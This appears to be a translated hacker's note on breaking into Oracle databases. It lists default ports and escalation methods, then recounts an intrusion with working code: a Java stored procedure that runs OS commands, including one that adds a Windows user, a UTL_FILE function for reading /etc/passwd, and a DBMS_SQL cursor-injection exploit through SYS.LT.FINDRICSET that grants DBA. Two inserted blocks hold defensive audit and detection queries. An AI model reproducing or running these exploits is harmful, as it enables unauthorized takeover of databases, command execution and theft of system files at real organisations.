###author:hiphop###
###qq:70381908###
Why pay attention to Oracle?
Because Oracle is used by a huge number of enterprises, so there are many targets to choose from for penetration.
Many enterprises never update and carry latent risks!
Privilege escalation is very simple, and getting a shell is easy!!
Reading the Black Hat paper got me started researching Oracle,
because it only covers a small part; the real security problems are much broader.
It just seems that few people domestically dig into this,
because they don't run into many such environments.
But hey, Oracle is a free download, heh heh.
You only pay to upgrade.
Connecting to Oracle generally requires the following:
IP
PORT
SID
username/password
The Oracle listener default port is 1521
generally in the 1521-1540 range
Scanning probes won't tell you which version is running, although newer nmap versions can obtain some of it; sending a TNS packet solves this problem.
A TNS packet reveals the Oracle version.
SID discovery methods:
1. The TNS listener directly
2. Brute-forcing default SIDs
3. Querying other components that may contain the SID
Username/password cracking
Privilege escalation methods:
Escalation 1: Java function
Win32Exec
Escalation 2: smbrelay
Run OS commands via sql injection in web applications
Run OS commands via create table
Run OS commands via dbms scheduler
Run OS commands via PL/SQL and Extproc
Run OS commands via Java
Run OS commands via Oracle Text
Run OS commands via PL/SQL Native (9i)
Run OS commands via PL/SQL Native (10g / 11g)
Run OS commands via alter system set events
More will be added!!
This post is just some small notes from my research.
I'll also introduce a tool, written in Python, that can do part of this.
Note:
Oracle default port list (port: service / product; how to change it)
80: Oracle HTTP Server listen port / Oracle HTTP Server port (Oracle Application Server; edit httpd.conf and restart OHS)
389: Oracle Internet Directory (non-SSL)
443: Oracle HTTP Server SSL port
636: Oracle Internet Directory (SSL)
1521: Oracle Net Listener / Enterprise Manager Repository port (Oracle Application Server / Oracle Database; edit listener.ora and restart listener)
1526: Oracle Net Listener (Oracle Database)
1575: Oracle Names (edit names.ora and restart names server)
1630: Oracle Connection Manager (CMAN) (Oracle Connection Manager; edit cman.ora and restart Connection Manager)
1701: Oracle JDBC for Rdb Thin Server (Oracle Rdb)
1748: Oracle Intelligent Agent (snmp_rw.ora); further ports listed without a description: 1754, 1808, 1809
1810: Enterprise Manager Servlet port SSL (Oracle Enterprise Manager)
1830: Oracle Connection Manager Admin (CMAN)
1831: Enterprise Manager Agent port
1850: Enterprise Manager RMI port
2100: Oracle XMLDB FTP port (change via dbms_xdb.cfg_update)
2481: Oracle GIOP IIOP (edit listener.ora/init.ora and restart listener/database)
2482: Oracle GIOP IIOP for SSL
3201: Oracle OC4J RMI
3301: Oracle OC4J AJP
3339: Enterprise Manager Reporting port (edit oem_webstage/oem.conf and restart OHS)
3401: Oracle OC4J IIOP
3501: Oracle OC4J IIOPS1
3601: Oracle OC4J IIOPS2
3701: Oracle OC4J JMS
4000: Oracle9iAS Web Cache Admin port (Webcache Admin GUI or webcache.xml)
4001: Oracle9iAS Web Cache Invalidation port
4002: Oracle9iAS Web Cache Statistics port
4031, 4032: listed without a description
4400: OracleAS Certificate Authority (OCA) - Server Authentication
4401: OracleAS Certificate Authority (OCA) - Mutual Authentication
4443: Oracle HTTP Server SSL port
4444: Oracle9iAS Web Cache HTTP Listen (SSL) port
4662: Oracle TimesTen; further ports listed without a description: 4758, 4759, 4761, 4764, 4766, 4767
5500: Oracle Enterprise Manager Web Console (Oracle Enterprise Manager Web)
5560: iSQLPlus 10g (Oracle i*SQLPlus)
5580: Oracle i*SQLPlus RMI port
6003: Oracle Notification Service request port
6100: Oracle Notification Service local port
6200: Oracle Notification Service remote port
6668: Oracle9iAS Clickstream Collector Agent
7000: Java Object Cache port
7100: DCM Java Object Cache port
7200: Oracle HTTP Server Diagnostic port
7501: Oracle HTTP Server Port Tunneling
7777: listed without a description
7779: Oracle9iAS Web Cache HTTP Listen (non-SSL) port
8007: Oracle HTTP Server Jserv port
8888: OC4J Forms / Reports Instance
8889: Oracle Developer Suite
9000: Oracle Forms Server 6 / 6i
9998: Oracle SOAP Server
14000: OS Agent
15000: Oracle Times Ten; further ports listed without a description: 15002, 15004
44000: Log Loader
This is a note from two years ago. Some content has been removed.
First, I connected to the Oracle server through a certain evil method...... (process omitted)
I was soon connected to the Oracle server, and found that:
1. The connection did not have DBA privileges
2. The SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES vulnerability could not be used to escalate privileges
3. Running SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual showed that the Oracle server could not reach the network.
Fortunately,
running
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
succeeded! This user has the CREATE PROCEDURE privilege.
I immediately thought of creating a Java extension to run commands:
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
    public static String runCMD(String args) {
        try {
            BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
            String stemp, str = "";
            while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
            myReader.close();
            return str;
        } catch (Exception e) {
            return e.toString();
        }
    }
}
begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String';
select * from all_objects where object_name like '%LINX%'
grant all on LinxRunCMD to public
select LinxRunCMD('cmd /c net user linx /add') from dual
But I got stuck at the very first step: for some unknown reason the server could not create the Java extension!!
Fortunately, we still have the UTL library to use:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
  fHandler UTL_FILE.FILE_TYPE;
  buf      varchar2(4000);
  output   varchar2(8000);
BEGIN
  -- open the file through the UTL_FILE_DIR directory object for reading
  fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
  loop
    begin
      utl_file.get_line(fHandler, buf);
      DBMS_OUTPUT.PUT_LINE('Cursor: '||buf);
    exception
      when no_data_found then exit;   -- end of file reached
    end;
    output := output||buf||chr(10);
  end loop;
  UTL_FILE.FCLOSE(fHandler);
  return output;
END;
UTL_FILE_DIR first has to be pointed at a directory with:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
But after running it I found I had no privilege to do so. The only option left was to find a way to escalate.
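As an added defender-side check, not part of the original note: the queries below, written against the standard Oracle DBA_* views, list the grants that the steps above depend on (PUBLIC EXECUTE on UTL_FILE/UTL_HTTP/DBMS_JAVA/DBMS_SQL/SYS.LT, CREATE PROCEDURE, directory objects, Java file permissions), so a DBA can see which of them a low-privileged account could actually use. They assume a user with SELECT on those views; the REVOKE lines at the end are the usual remediation, listed for reference.

```sql
-- Added audit queries (not from the original note). Run as a user with
-- SELECT on the DBA_* views, e.g. SYSTEM.

-- 1. PUBLIC EXECUTE on the SYS packages the note leans on.
SELECT table_name AS package_name, grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('UTL_FILE', 'UTL_HTTP', 'DBMS_JAVA', 'DBMS_SQL',
                      'LT', 'DBMS_EXPORT_EXTENSION')
 ORDER BY table_name;

-- 2. Accounts that can create stored code (the CREATE PROCEDURE check
--    the note performs by trial) or arbitrary directory objects.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE',
                     'CREATE ANY DIRECTORY')
 ORDER BY privilege, grantee;

-- 3. Directory objects and who may read or write through them
--    (a UTL_FILE_DIR directory like the one above would show up here).
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.owner = 'SYS' AND p.table_name = d.directory_name
 ORDER BY d.directory_name, p.grantee;

-- 4. Java permissions held by PUBLIC (dbms_java.grant_permission above
--    tries to give PUBLIC execute on <<ALL FILES>>).
SELECT grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE grantee = 'PUBLIC'
   AND type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
 ORDER BY type_name, name;

-- Usual remediation for findings in query 1, shown for reference:
-- REVOKE EXECUTE ON SYS.UTL_FILE FROM PUBLIC;
-- REVOKE EXECUTE ON SYS.UTL_HTTP FROM PUBLIC;
-- REVOKE EXECUTE ON SYS.DBMS_JAVA FROM PUBLIC;
```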
*************** Cursor injection ***************
Foreigners have written N PDFs introducing this technique; I trimmed the code down to:
DECLARE
  MYC NUMBER;
BEGIN
  MYC := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(MYC, 'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;', 0);
  DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
  BEGIN
    SYS.LT.FINDRICSET('.''||dbms_sql.execute( '||MYC||' )||'''')--', 'x');
  END;
  raise NO_DATA_FOUND;
EXCEPTION
  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
  WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
After running it, reconnect and you have DBA privileges. Simple, right......
Now files can be read:
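As an added detection example, not part of the original note: the queries below show what the escalation above leaves behind in a standard Oracle instance, namely an extra DBA role holder, a GRANT recorded in the audit trail, and newly created stored code. They assume a user with SELECT on the DBA_* views and, for the second query, that standard auditing of grants is enabled (AUDIT GRANT ROLE, AUDIT SYSTEM GRANT); the 7-day window is an arbitrary choice.

```sql
-- Added detection queries (not from the original note). Run as a user
-- with SELECT on the DBA_* views.

-- 1. Everyone currently holding DBA; compare against the approved list.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

-- 2. Grant statements recorded in the last 7 days. A GRANT ROLE issued
--    from the session of an account that holds no GRANT ANY ROLE privilege
--    is the trace the cursor-injection trick above leaves behind.
SELECT timestamp, username, os_username, userhost, action_name,
       obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name IN ('GRANT ROLE', 'SYSTEM GRANT', 'GRANT OBJECT')
   AND timestamp > SYSDATE - 7
 ORDER BY timestamp DESC;

-- 3. Stored code and Java sources created recently outside SYS/SYSTEM
--    (objects like the note's LINX% functions and Java source appear here).
SELECT owner, object_name, object_type, created
  FROM dba_objects
 WHERE object_type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE',
                       'JAVA SOURCE', 'JAVA CLASS')
   AND created > SYSDATE - 7
   AND owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY created DESC;
```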
select LinxUTLReadfile('passwd') from dual
The rest is easy, so I won't write it up.